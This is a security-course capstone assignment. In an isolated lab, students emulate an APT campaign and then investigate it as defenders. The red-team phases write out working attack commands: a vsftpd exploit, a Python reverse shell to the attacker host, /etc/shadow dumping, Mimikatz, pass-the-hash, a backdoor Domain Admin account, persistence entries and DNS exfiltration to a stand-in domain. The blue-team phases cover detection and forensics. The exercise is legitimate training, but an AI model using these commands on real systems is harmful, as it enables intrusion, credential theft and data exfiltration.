seclab/CAPSTONE_APT_Simulation.md

CAPSTONE PROJECT: Operation Serpent's Shadow

Advanced Persistent Threat (APT) Simulation & Incident Response

Duration: 24-30 hours Points: 200 (Red Team: 100pts, Blue Team: 100pts) Prerequisites: MOD0-MOD8 completion Difficulty: Advanced

---

Executive Summary

Operation Serpent's Shadow is a comprehensive capstone exercise simulating a sophisticated APT campaign against the Apophis Networking infrastructure. You will first act as the Red Team executing a 7-phase attack campaign, then switch roles to become the Blue Team investigating and responding to your own intrusion.

This capstone tests your ability to:

• Execute complex multi-stage attacks using techniques from MITRE ATT&CK
• Maintain operational security while achieving attack objectives
• Detect, analyze, and respond to advanced threats
• Document findings in professional incident response reports
• Apply threat intelligence to real-world scenarios

Scenario: A nation-state APT group (codename: SERPENT SYNDICATE) has targeted Apophis Networking to steal intellectual property and maintain persistent access. You will emulate this threat actor, then hunt and remediate the intrusion.

---

Learning Objectives

By completing this capstone, you will demonstrate:

1. Red Team Skills:

   • Multi-phase attack chain execution (reconnaissance → persistence)
   • Evasion of security controls (IDS/IPS, EDR simulation)
   • Credential harvesting and lateral movement
   • Data exfiltration techniques
   • OPSEC and TTPs documentation

2. Blue Team Skills:

   • Security log analysis across multiple sources (SIEM, firewall, endpoint)
   • Intrusion detection and alert triage
   • Digital forensics (disk, memory, network)
   • Incident response lifecycle (NIST PICERL)
   • Threat intelligence correlation (MITRE ATT&CK mapping)
   • Remediation and hardening recommendations

3. Professional Skills:

   • Technical report writing
   • Timeline reconstruction
   • Executive briefing creation
   • Post-incident review documentation

---

Lab Environment

Network Topology

VLAN 100 (Management)    : 10.10.1.0/24 - Proxmox, pfSense
VLAN 200 (Red Team)      : 10.10.2.0/24 - Kali Linux
VLAN 300 (Blue Team)     : 10.10.3.0/24 - Security Onion
VLAN 400 (Victim Network): 10.10.4.0/24 - Target Systems

Target Systems (VLAN 400)

1. DC01 (10.10.4.10) - Windows Server 2022 Domain Controller

   • Domain: apophis.local
   • Services: AD, DNS, LDAP, Kerberos

2. WS01 (10.10.4.20) - Windows 10 Workstation (HR Department)

   • Domain-joined
   • User: hruser (Domain Users group)

3. WS02 (10.10.4.21) - Windows 10 Workstation (IT Admin)

   • Domain-joined
   • User: itadmin (Domain Admins group - simulated compromised admin)

4. WEB01 (10.10.4.30) - DVWA Web Server (Ubuntu + Docker)

   • Services: HTTP (80), SSH (22), MySQL (3306)

5. FILE01 (10.10.4.40) - Metasploitable 2 (Legacy File Server)

   • Services: FTP (21), SMB (445), SSH (22)

Attack Infrastructure (VLAN 200)

• Kali Linux (10.10.2.50)
  • Tools: Nmap, Metasploit, Impacket, BloodHound, Responder, Mimikatz

Monitoring Infrastructure (VLAN 300)

• Security Onion (10.10.3.100)
  • SIEM: Kibana/Elasticsearch
  • IDS/IPS: Suricata
  • Network Forensics: Zeek (Bro), PCAP

---

PHASE 1: RED TEAM OPERATION (100 Points)

Pre-Engagement Checklist

Before starting the attack campaign:

1. Create Attack VM Snapshot: Kali_PreAttack_Snapshot
2. Create Target VM Snapshots: Snapshot all VLAN 400 systems
3. Verify Network Isolation: Confirm VLAN segmentation and firewall rules
4. Start Security Onion: Ensure all sensors are running
5. Create Attack Log Directory:

   mkdir -p ~/capstone/red_team/{logs,screenshots,loot,exfil}
   script ~/capstone/red_team/logs/attack_$(date +%Y%m%d_%H%M%S).log
   

---

Attack Phase 1: External Reconnaissance (10 Points)

Objective: Map the external attack surface without triggering alerts.

TTPs: MITRE ATT&CK - TA0043 (Reconnaissance)

Tasks:

1. Passive Reconnaissance:

   # Simulated OSINT gathering (document in report)
   echo "apophis.local" > targets.txt
   echo "10.10.4.0/24" >> targets.txt
   
   # DNS enumeration (if DNS is exposed)
   dig @10.10.4.10 apophis.local ANY
   dig @10.10.4.10 apophis.local AXFR
   

2. Active Network Scanning:

   # Stealthy host discovery (SYN scan, no ICMP)
   sudo nmap -sS -Pn -T2 --max-retries 1 -oA recon/syn_scan 10.10.4.0/24
   
   # Service enumeration on discovered hosts
   sudo nmap -sV -sC -p- --open -T3 -oA recon/service_scan 10.10.4.0/24
   

3. SMB/NetBIOS Enumeration:

   # Enumerate SMB shares and users
   enum4linux -a 10.10.4.10 | tee recon/enum4linux_dc01.txt
   smbclient -L //10.10.4.40 -N | tee recon/smbshares_file01.txt
   

Deliverables:

• Nmap scan results (XML + screenshot)
• Network topology diagram with discovered hosts/services
• Target prioritization list (justify choices)

Assessment Criteria (10pts):

• Comprehensive service enumeration (5pts)
• Evasion techniques documented (3pts)
• Target analysis and prioritization (2pts)

---

Attack Phase 2: Initial Access (15 Points)

Objective: Gain initial foothold on the victim network.

TTPs: MITRE ATT&CK - TA0001 (Initial Access) Techniques: T1190 (Exploit Public-Facing Application), T1078 (Valid Accounts)

Scenario: You discovered FILE01 (Metasploitable 2) running vulnerable vsftpd 2.3.4.

Tasks:

1. Exploit vsftpd Backdoor (from MOD3):

   msfconsole -q
   use exploit/unix/ftp/vsftpd_234_backdoor
   set RHOSTS 10.10.4.40
   set PAYLOAD cmd/unix/interact
   exploit
   

2. Establish Meterpreter Session:

   # Upgrade to full Meterpreter shell
   # (Use MSFVenom payload + upload via FTP if needed)
   python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.2.50",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
   

3. System Enumeration:

   # Gather system information
   uname -a
   id
   cat /etc/passwd
   cat /etc/shadow 2>/dev/null
   netstat -tulpn
   ls -la /home
   

Deliverables:

• Screenshot of successful exploit
• Output of system enumeration commands
• Screenshot showing whoami and ifconfig from victim

Assessment Criteria (15pts):

• Successful initial access (10pts)
• System enumeration completeness (3pts)
• Shell stability and upgrade (2pts)

---

Attack Phase 3: Credential Access (15 Points)

Objective: Harvest credentials to enable lateral movement.

TTPs: MITRE ATT&CK - TA0006 (Credential Access) Techniques: T1003 (OS Credential Dumping), T1110 (Brute Force)

Tasks:

1. Linux Credential Harvesting (FILE01):

   # Dump /etc/shadow (if accessible)
   cat /etc/shadow
   
   # Search for credentials in config files
   grep -ri password /var/www/html 2>/dev/null
   grep -ri password /home 2>/dev/null
   find / -name "*pass*" -type f 2>/dev/null | head -20
   

2. Password Cracking:

   # Save hashes and crack with John
   unshadow /tmp/passwd /tmp/shadow > /tmp/unshadowed.txt
   john --wordlist=/usr/share/wordlists/rockyou.txt /tmp/unshadowed.txt
   john --show /tmp/unshadowed.txt
   

3. Web Application Credential Extraction (WEB01):

   # SQL injection to dump DVWA users (MOD7 techniques)
   sqlmap -u "http://10.10.4.30/vulnerabilities/sqli/?id=1&Submit=Submit#" \
          --cookie="PHPSESSID=<your-session>" \
          --dump -D dvwa -T users
   

4. Network Credential Sniffing (Advanced):

   # Responder for NTLM hash capture (if AD communication observed)
   sudo responder -I eth0 -wrf
   

Deliverables:

• Cracked password list (at least 3 accounts)
• Screenshot of John the Ripper output
• Captured NTLM hashes (if applicable)
• SQL injection dump results

Assessment Criteria (15pts):

• Multiple credential sources exploited (7pts)
• Successful password cracking (5pts)
• Documentation of credential storage locations (3pts)

---

Attack Phase 4: Lateral Movement (20 Points)

Objective: Pivot from initial foothold to domain-joined systems.

TTPs: MITRE ATT&CK - TA0008 (Lateral Movement) Techniques: T1021.002 (SMB/Windows Admin Shares), T1550.002 (Pass the Hash)

Scenario: You obtained credentials for itadmin and need to access WS02.

Tasks:

1. SMB Authentication Testing:

   # Test credentials against domain systems
   crackmapexec smb 10.10.4.0/24 -u itadmin -p 'P@ssw0rd123' --shares
   crackmapexec smb 10.10.4.0/24 -u itadmin -p 'P@ssw0rd123' --local-auth
   

2. PSExec Lateral Movement:

   # Gain shell on WS02 using Impacket
   impacket-psexec 'apophis.local/itadmin:P@ssw0rd123@10.10.4.21'
   
   # Alternative: WMIExec
   impacket-wmiexec 'apophis.local/itadmin:P@ssw0rd123@10.10.4.21'
   

3. Kerberoasting Attack (MOD5 techniques):

   # Request service tickets for cracking
   impacket-GetUserSPNs 'apophis.local/itadmin:P@ssw0rd123' -dc-ip 10.10.4.10 -request
   
   # Crack TGS tickets
   hashcat -m 13100 tgs_tickets.txt /usr/share/wordlists/rockyou.txt --force
   

4. BloodHound Enumeration (Advanced):

   # Collect AD data
   bloodhound-python -d apophis.local -u itadmin -p 'P@ssw0rd123' \
                     -ns 10.10.4.10 -c all
   
   # Import into BloodHound GUI and analyze shortest path to Domain Admins
   

Deliverables:

• Screenshot of successful lateral movement to WS02
• CrackMapExec output showing access to multiple systems
• Kerberoast TGS tickets (if obtained)
• BloodHound attack path graph (screenshot)

Assessment Criteria (20pts):

• Successful lateral movement to domain system (10pts)
• Use of multiple techniques (5pts)
• Active Directory enumeration completeness (5pts)

---

Attack Phase 5: Privilege Escalation & Persistence (20 Points)

Objective: Escalate to Domain Admin and establish persistent access.

TTPs: MITRE ATT&CK - TA0004 (Privilege Escalation), TA0003 (Persistence) Techniques: T1068 (Exploitation for Privilege Escalation), T1136 (Create Account), T1547 (Boot/Logon Autostart)

Tasks:

1. Mimikatz Credential Dumping (WS02):

   # On compromised WS02 system
   mimikatz.exe
   privilege::debug
   sekurlsa::logonpasswords
   lsadump::sam
   lsadump::secrets
   

2. Pass-the-Hash to Domain Controller:

   # Use captured NTLM hash to access DC01
   impacket-psexec -hashes :31d6cfe0d16ae931b73c59d7e0c089c0 'apophis.local/Administrator@10.10.4.10'
   

3. Create Backdoor Domain Account:

   # On DC01
   net user backdoor P@ssw0rd123! /add /domain
   net group "Domain Admins" backdoor /add /domain
   net user backdoor
   

4. Scheduled Task Persistence (WS02):

   # Create scheduled task for Meterpreter callback
   schtasks /create /tn "Windows Update Check" /tr "C:\Windows\Temp\update.exe" \
            /sc onlogon /ru SYSTEM /f
   

5. Registry Persistence (Alternative):

   # Add Run key
   reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" \
       /v SecurityUpdate /t REG_SZ /d "C:\Windows\Temp\update.exe" /f
   

Deliverables:

• Screenshot of Mimikatz credential dump
• Proof of Domain Admin access (screenshot of whoami /groups on DC01)
• Backdoor account creation evidence
• Persistence mechanism documentation (scheduled task/registry)

Assessment Criteria (20pts):

• Domain Admin privileges achieved (10pts)
• Credential dumping success (5pts)
• Persistence mechanisms installed (3pts)
• Stealth considerations documented (2pts)

---

Attack Phase 6: Data Exfiltration (10 Points)

Objective: Locate and exfiltrate sensitive data.

TTPs: MITRE ATT&CK - TA0010 (Exfiltration) Techniques: T1041 (Exfiltration Over C2 Channel), T1048 (Exfiltration Over Alternative Protocol)

Tasks:

1. Data Discovery:

   # Search for sensitive files
   Get-ChildItem -Path C:\ -Include *.docx,*.xlsx,*.pdf -Recurse -ErrorAction SilentlyContinue |
       Where-Object { $_.Length -lt 10MB } |
       Select-Object FullName, Length
   
   # Search for "confidential" or "password" in file contents
   findstr /si "password" C:\Users\*.txt C:\Users\*.docx
   

2. Exfiltration via HTTP:

   # On Kali (setup listener)
   sudo python3 -m http.server 8080
   
   # On victim (download via curl/wget)
   certutil -urlcache -f http://10.10.2.50:8080/file.zip C:\Windows\Temp\file.zip
   

3. DNS Exfiltration (Stealth technique):

   # Encode data in DNS queries (simulate)
   $data = [Convert]::ToBase64String([System.Text.Encoding]::UTF8.GetBytes("SECRET_DATA"))
   nslookup "$data.attacker.com" 10.10.2.50
   

4. Simulate Intellectual Property Theft:

   # Create fake sensitive document on DC01
   echo "Apophis Networking - Proprietary Research Data" > C:\Shares\Research\IP_Data.txt
   
   # Compress and exfiltrate
   Compress-Archive -Path C:\Shares\Research\* -DestinationPath C:\Windows\Temp\exfil.zip
   # Transfer using Meterpreter 'download' command
   

Deliverables:

• List of discovered sensitive files (screenshot)
• Screenshot of successful exfiltration
• Network capture showing exfiltration traffic (PCAP)
• Exfiltrated file samples (in ~/capstone/red_team/exfil/)

Assessment Criteria (10pts):

• Data discovery methodology (4pts)
• Successful exfiltration (4pts)
• Stealth techniques used (2pts)

---

Attack Phase 7: Red Team Reporting (10 Points)

Objective: Document the attack chain for Blue Team analysis.

Tasks:

1. Create Attack Timeline:

   • Document each phase with timestamps
   • Include all commands executed
   • Note which actions likely triggered alerts

2. MITRE ATT&CK Mapping:

   • Map each technique to ATT&CK framework
   • Create coverage matrix (Tactics vs Techniques)
   • Export for dashboard integration

3. Indicators of Compromise (IOCs):

   • File paths created: C:\Windows\Temp\update.exe
   • Registry keys modified: HKLM\...\Run\SecurityUpdate
   • Network connections: 10.10.2.50:4444 (Meterpreter)
   • User accounts created: backdoor
   • Scheduled tasks: Windows Update Check

4. Red Team Report Structure:

   # Red Team Report: Operation Serpent's Shadow
   
   ## Executive Summary
   - Attack duration: X hours
   - Systems compromised: 5/5 (100%)
   - Privileges gained: Domain Admin
   - Data exfiltrated: XX MB
   
   ## Attack Chain
   [Phase 1] External Recon → [Phase 2] Initial Access (FILE01) →
   [Phase 3] Credential Harvesting → [Phase 4] Lateral Movement (WS02) →
   [Phase 5] Domain Admin (DC01) + Persistence → [Phase 6] Data Exfiltration
   
   ## Techniques Used
   [MITRE ATT&CK mapping table]
   
   ## Indicators of Compromise
   [IOC list]
   
   ## Detection Gaps Identified
   [Where Blue Team should have caught you]
   

Deliverables:

• Complete Red Team report (PDF format)
• MITRE ATT&CK Navigator JSON file
• IOC list (CSV format)
• Complete command log from script session

Assessment Criteria (10pts):

• Report completeness and professionalism (5pts)
• Accurate MITRE ATT&CK mapping (3pts)
• Comprehensive IOC documentation (2pts)

---

PHASE 2: BLUE TEAM OPERATION (100 Points)

Pre-Investigation Checklist

Before starting the Blue Team phase:

1. Preserve Evidence:

   • Create forensic snapshots of all compromised VMs
   • Copy Security Onion logs: /nsm/sensor_data/
   • Export SIEM data from Kibana (last 24 hours)

2. Establish Blue Team Workspace:

   mkdir -p ~/capstone/blue_team/{forensics,pcaps,logs,reports,timeline}
   script ~/capstone/blue_team/logs/investigation_$(date +%Y%m%d_%H%M%S).log
   

3. Review Red Team Report (IOCs only - not methodology yet):

   • Extract IOC list to use as detection baseline
   • Do NOT review attack methodology - simulate real-world blind investigation

---

Investigation Phase 1: Detection & Triage (15 Points)

Objective: Identify security alerts and determine scope of compromise.

Tasks:

1. SIEM Alert Review (Security Onion Kibana):

   # High severity alerts in last 24 hours
   event.severity: high OR event.severity: critical
   | stats count by rule.name, source.ip, destination.ip
   
   # Suspicious network connections to VLAN 200
   destination.ip: 10.10.2.* AND event.category: network
   
   # Authentication anomalies
   event.category: authentication AND event.outcome: failure
   | stats count by user.name, source.ip
   

2. Suricata Alert Analysis:

   # Review IDS alerts
   sudo cat /var/log/suricata/fast.log | grep -E "ET|MALWARE|EXPLOIT"
   
   # Extract unique alert signatures
   jq -r '.alert.signature' /var/log/suricata/eve.json | sort -u
   

3. Zeek Log Analysis:

   # Identify unusual connections
   zeek-cut id.orig_h id.resp_h id.resp_p proto < /nsm/zeek/logs/current/conn.log |
       sort | uniq -c | sort -rn | head -20
   
   # DNS queries to suspicious domains
   zeek-cut query answers < /nsm/zeek/logs/current/dns.log | grep -v ".local"
   

4. Initial Hypothesis:

   • Document which systems appear compromised
   • Identify likely attack entry point
   • Estimate timeline of initial compromise

Deliverables:

• Top 10 critical alerts (screenshot)
• Network connection matrix (source → dest mapping)
• Initial incident triage report (1-2 pages)

Assessment Criteria (15pts):

• Alert prioritization and triage (7pts)
• Correct identification of compromised systems (5pts)
• Timeline accuracy (3pts)

---

Investigation Phase 2: Network Forensics (15 Points)

Objective: Analyze network traffic to reconstruct attack activities.

Tasks:

1. PCAP Analysis (Wireshark):

   # Export suspicious traffic from Security Onion
   sudo tcpdump -r /nsm/sensor_data/securityonion-eth1/dailylogs/*.pcap \
                'host 10.10.2.50 or host 10.10.4.40' \
                -w ~/capstone/blue_team/pcaps/attack_traffic.pcap
   

2. Identify C2 Communication:

   • Filter for connections to Kali (10.10.2.50)
   • Look for Meterpreter beacons (TCP 4444, HTTP reverse shells)
   • Identify exfiltration channels

3. Extract Artifacts from PCAP:

   # Export HTTP objects (potential exfil data)
   tshark -r attack_traffic.pcap --export-objects http,/tmp/http_objects/
   
   # SMB file transfers
   tshark -r attack_traffic.pcap -Y "smb2.cmd == 0x0009" -T fields \
          -e frame.time -e ip.src -e ip.dst -e smb2.filename
   

4. Protocol Analysis:

   • Document SMB sessions (lateral movement)
   • Kerberos TGT/TGS requests (Kerberoasting)
   • DNS queries (potential DNS tunneling)
   • HTTP POST requests (data exfiltration)

Deliverables:

• Annotated PCAP with attack traffic highlighted
• Screenshot of C2 communication in Wireshark
• Extracted artifacts (HTTP objects, SMB files)
• Network forensics report (protocol breakdown)

Assessment Criteria (15pts):

• Correct identification of attack traffic (7pts)
• C2 channel analysis (5pts)
• Artifact extraction completeness (3pts)

---

Investigation Phase 3: Host Forensics (20 Points)

Objective: Perform disk and memory forensics on compromised systems.

Tasks:

1. Disk Forensics with Autopsy (FILE01 - Initial Access Point):

   # Create disk image
   sudo dd if=/dev/sda of=~/capstone/blue_team/forensics/file01.dd bs=4M status=progress
   
   # Import into Autopsy and analyze:
   # - Timeline of file modifications
   # - Deleted files recovery
   # - Web history / bash history
   # - Malware artifacts
   

2. Memory Forensics with Volatility (WS02 - Lateral Movement Target):

   # Capture memory dump (from Proxmox or use FTK Imager)
   # Analyze with Volatility 3
   
   python3 vol.py -f ws02_memory.raw windows.info
   python3 vol.py -f ws02_memory.raw windows.pslist
   python3 vol.py -f ws02_memory.raw windows.netscan
   python3 vol.py -f ws02_memory.raw windows.malfind
   python3 vol.py -f ws02_memory.raw windows.dumpfiles --pid <suspicious_pid>
   

3. Windows Event Log Analysis (DC01):

   # Security event logs (authentication)
   Get-WinEvent -LogName Security -FilterXPath "*[System[EventID=4624 or EventID=4625 or EventID=4672]]" |
       Where-Object { $_.TimeCreated -gt (Get-Date).AddHours(-24) } |
       Select-Object TimeCreated, Id, Message
   
   # Logon events (type 3 = network, type 10 = remote interactive)
   Get-WinEvent -FilterHashtable @{LogName='Security'; ID=4624} |
       Where-Object { $_.Properties[8].Value -eq 3 -or $_.Properties[8].Value -eq 10 }
   
   # Account creation events
   Get-WinEvent -FilterHashtable @{LogName='Security'; ID=4720}
   

4. Registry Forensics (Persistence Mechanisms):

   # Check Run keys
   Get-ItemProperty "HKLM:\Software\Microsoft\Windows\CurrentVersion\Run"
   
   # Scheduled tasks
   Get-ScheduledTask | Where-Object { $_.Principal.UserId -eq "SYSTEM" } |
       Select-Object TaskName, TaskPath, Date
   
   # Services
   Get-Service | Where-Object { $_.StartType -eq "Automatic" -and $_.Status -eq "Running" }
   

Deliverables:

• Autopsy case report with timeline
• Volatility analysis results (processes, network connections)
• Windows Event Log summary (authentication anomalies)
• Registry forensics findings (persistence mechanisms)

Assessment Criteria (20pts):

• Disk forensics completeness (7pts)
• Memory forensics quality (7pts)
• Event log analysis (4pts)
• Persistence mechanism identification (2pts)

---

Investigation Phase 4: Incident Response (NIST PICERL) (20 Points)

Objective: Execute full incident response lifecycle.

NIST PICERL Framework:

1. Preparation (Already completed - lab setup)
2. Identification (Completed in Phase 1)
3. Containment (Short-term and Long-term)
4. Eradication (Remove attacker presence)
5. Recovery (Restore services)
6. Lessons Learned (Post-incident review)

Tasks:

1. Containment Actions:

   # Short-term: Isolate compromised systems
   # On pfSense, block Kali IP
   pfctl -t blocklist -T add 10.10.2.50
   
   # Disable backdoor account
   net user backdoor /active:no
   
   # Kill suspicious processes (on WS02)
   Get-Process | Where-Object { $_.Path -like "*\Temp\*" } | Stop-Process -Force
   

2. Eradication:

   # Remove malware artifacts
   Remove-Item "C:\Windows\Temp\update.exe" -Force
   
   # Remove persistence mechanisms
   schtasks /delete /tn "Windows Update Check" /f
   reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v SecurityUpdate /f
   
   # Delete backdoor account
   net user backdoor /delete /domain
   
   # Reset compromised accounts
   net user itadmin NewP@ssw0rd123! /domain
   

3. Recovery:

   # Restore from clean snapshots (if available)
   # Rebuild compromised systems
   
   # Verify AD integrity
   dcdiag /v > dcdiag_output.txt
   repadmin /replsummary
   
   # Reset Kerberos keys
   ksetup /setenctypeattr apophis.local AES256-CTS-HMAC-SHA1-96
   

4. Hardening Recommendations:

   • Enable LSASS protection: Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Control\Lsa" -Name "RunAsPPL" -Value 1
   • Implement tiered admin model
   • Deploy EDR solution (simulate with Sysmon)
   • Update firewall rules (segment VLANs further)

Deliverables:

• Containment action log (timestamped)
• Eradication checklist (completed tasks)
• System recovery documentation
• Hardening recommendations report (5+ actionable items)

Assessment Criteria (20pts):

• Proper NIST PICERL execution (10pts)
• Completeness of eradication (5pts)
• Quality of hardening recommendations (5pts)

---

Investigation Phase 5: Threat Intelligence & Attribution (15 Points)

Objective: Map attack to MITRE ATT&CK and perform threat actor profiling.

Tasks:

1. MITRE ATT&CK Mapping:

   • Create spreadsheet mapping observed TTPs to ATT&CK techniques
   • Use ATT&CK Navigator to visualize coverage
   • Identify gaps in detection coverage

2. Threat Actor Profiling:

   # Threat Actor: SERPENT SYNDICATE (Simulated APT)
   
   **Sophistication Level**: Advanced
   
   **Observed TTPs**:
   - Initial Access: T1190 (Exploit Public-Facing Application)
   - Credential Access: T1003 (OS Credential Dumping)
   - Lateral Movement: T1021.002 (SMB/Windows Admin Shares)
   - Persistence: T1136 (Create Account), T1053 (Scheduled Task)
   - Exfiltration: T1041 (C2 Channel)
   
   **Tools Used**:
   - Metasploit Framework
   - Impacket suite
   - Mimikatz
   - Custom PowerShell scripts
   
   **Targeting**: Intellectual property theft, persistent access
   
   **Comparison**: Similar to APT29 (Cozy Bear) - use of living-off-the-land techniques
   

3. IOC Generation for Threat Intelligence Platforms:

   indicator,type,severity,context
   10.10.2.50,ipv4,high,C2 Server
   update.exe,filename,critical,Persistent malware
   backdoor,username,critical,Rogue domain account
   "Windows Update Check",scheduled_task,high,Persistence mechanism
   C:\Windows\Temp\*,filepath,medium,Malware staging directory
   

4. Dashboard Integration (MOD8 Link):

   • Export MITRE heatmap JSON to dashboard/src/data/live/mitre_coverage.json
   • Update threat feed with real IOCs
   • Visualize attack timeline in Incident Tracker component

Deliverables:

• MITRE ATT&CK Navigator layer file (JSON)
• Threat actor profile report (2-3 pages)
• IOC list in STIX format (or CSV)
• Dashboard integration (screenshot of updated heatmap)

Assessment Criteria (15pts):

• Accurate MITRE ATT&CK mapping (7pts)
• Threat actor profiling quality (5pts)
• IOC quality and completeness (3pts)

---

Investigation Phase 6: Final IR Report (15 Points)

Objective: Create comprehensive incident response report for executive leadership.

Report Structure (Use LAB_REPORT_TEMPLATE.md as base):

# Incident Response Report: Operation Serpent's Shadow
## Security Incident #2026-001

**Classification**: CONFIDENTIAL
**Date**: [Current Date]
**Incident Handler**: [Your Name]
**Severity**: CRITICAL

---

## Executive Summary (1 page)
- **What Happened**: Brief overview of the incident
- **Impact**: Systems compromised, data exfiltrated
- **Root Cause**: Unpatched vsftpd vulnerability on legacy server
- **Remediation Status**: All threats eradicated, systems hardened
- **Recommendation**: Decommission FILE01, implement vulnerability management program

---

## Incident Timeline (2-3 pages)
| Timestamp | Event | System | Action |
|-----------|-------|--------|--------|
| 2026-02-10 14:23 | Initial scan detected | FILE01 | Suricata alert fired |
| 2026-02-10 14:45 | vsftpd exploit successful | FILE01 | Attacker gained shell |
| ... | ... | ... | ... |

---

## Technical Analysis (5-7 pages)

### Attack Chain
[Detailed walkthrough of each attack phase]

### Network Forensics
[PCAP analysis findings]

### Host Forensics
[Autopsy/Volatility findings]

### MITRE ATT&CK Mapping
[Table of techniques used]

---

## Indicators of Compromise (1 page)
[Complete IOC list]

---

## Response Actions (2-3 pages)

### Containment
[What was done to stop the attack]

### Eradication
[How threats were removed]

### Recovery
[How systems were restored]

---

## Lessons Learned (2 pages)

### What Went Well
- IDS detected initial scanning activity
- Log retention allowed full forensic analysis

### What Could Be Improved
- Delayed response to initial alerts (simulated)
- Legacy system not in patch management program
- No EDR on endpoints

### Recommendations
1. Implement 24/7 SOC monitoring
2. Deploy EDR across all endpoints
3. Decommission Metasploitable 2 (FILE01)
4. Conduct quarterly red team exercises
5. Implement tiered admin model

---

## Appendices
- Appendix A: Complete IOC List
- Appendix B: MITRE ATT&CK Navigator JSON
- Appendix C: Network Topology Diagram
- Appendix D: Forensic Evidence Inventory

Deliverables:

• Final IR report (PDF, 15-20 pages)
• Executive briefing (PowerPoint, 5-7 slides)
• Complete evidence package (ZIP archive)
• Post-incident review presentation

Assessment Criteria (15pts):

• Report professionalism and completeness (7pts)
• Technical accuracy (5pts)
• Actionable recommendations (3pts)

---

Final Deliverables Checklist

Red Team Package (50 Points)

• Attack command logs (script output)
• Screenshots (minimum 15)
• Red Team report (PDF)
• MITRE ATT&CK Navigator JSON
• IOC list (CSV)
• Exfiltrated data samples

Blue Team Package (50 Points)

• Investigation logs
• Forensic images (disk + memory)
• PCAP files with annotations
• Incident Response report (PDF)
• Executive briefing (PPTX)
• Remediation documentation
• Dashboard integration (screenshots)

Submission Format

Create ZIP archive: CAPSTONE_YourName_OperationSerpentsShadow.zip

CAPSTONE_YourName_OperationSerpentsShadow/
├── 01_Red_Team/
│   ├── logs/
│   ├── screenshots/
│   ├── loot/
│   ├── exfil/
│   ├── RedTeam_Report.pdf
│   └── MITRE_ATT&CK_Layer.json
├── 02_Blue_Team/
│   ├── forensics/
│   ├── pcaps/
│   ├── logs/
│   ├── IR_Report.pdf
│   ├── Executive_Briefing.pptx
│   └── Remediation_Plan.md
└── README.md (submission summary)

---

Assessment Rubric

Red Team Assessment (100 Points)

Phase	Criteria	Points
Phase 1: Recon	Service enumeration completeness	10
Phase 2: Initial Access	Successful exploitation	15
Phase 3: Credential Access	Multiple credential sources	15
Phase 4: Lateral Movement	Domain system compromise	20
Phase 5: Privilege Escalation	Domain Admin achieved	20
Phase 6: Exfiltration	Data extraction success	10
Phase 7: Reporting	Documentation quality	10

Blue Team Assessment (100 Points)

Phase	Criteria	Points
Phase 1: Detection	Alert triage accuracy	15
Phase 2: Network Forensics	PCAP analysis quality	15
Phase 3: Host Forensics	Disk/memory analysis	20
Phase 4: Incident Response	NIST PICERL execution	20
Phase 5: Threat Intelligence	MITRE ATT&CK mapping	15
Phase 6: Final Report	Professional documentation	15

Total: 200 Points

Grading Scale:

• 180-200: Exceptional (A)
• 160-179: Excellent (B)
• 140-159: Good (C)
• Below 140: Needs Improvement (Resubmit)

---

Additional Resources

Recommended Reading

• MITRE ATT&CK Framework: https://attack.mitre.org
• NIST SP 800-61r2 (Incident Response Guide)
• SANS Incident Response Poster
• Red Team Field Manual (RTFM)
• Blue Team Field Manual (BTFM)

Tools Reference

• Red Team: Metasploit, Impacket, Mimikatz, BloodHound, CrackMapExec
• Blue Team: Volatility 3, Autopsy, Wireshark, Zeek, Suricata, KQL

Dashboard Integration

• Export MITRE coverage: dashboard/src/data/live/mitre_coverage.json
• Update threat feed: dashboard/src/data/live/threat_feed.json
• Timeline visualization: Use Recharts LineChart component

---

Post-Capstone Next Steps

After completing this capstone:

1. Rebuild Lab Environment: Reset all VMs to clean state
2. Apply Hardening: Implement your own remediation recommendations
3. Re-Attack: Attempt the same attack chain - what changed?
4. Advanced Scenarios: Try different attack paths (web app → AD, phishing simulation)
5. Contribute to Dashboard: Add real detection logic to React components

---

Academic Integrity Statement

This capstone represents your own work and understanding of offensive and defensive security operations. You may use:

• Official tool documentation
• MITRE ATT&CK knowledge base
• Course module materials (MOD0-MOD8)

You may NOT:

• Copy attack scripts without understanding them
• Use automated red team frameworks (Cobalt Strike, Covenant) - manual techniques only
• Plagiarize reports from online sources

Authorized Use Only: These techniques are for educational purposes in a controlled lab environment. Unauthorized use against systems you do not own or have explicit permission to test is illegal.

---

Contact & Support

For technical issues:

• Review module materials (MOD0-MOD8)
• Check LAB_REPORT_TEMPLATE.md for report formatting
• Consult ASSESSMENT_RUBRICS.md for grading criteria

Good luck, and remember: "Order from Chaos" 🐍

---

END OF CAPSTONE PROJECT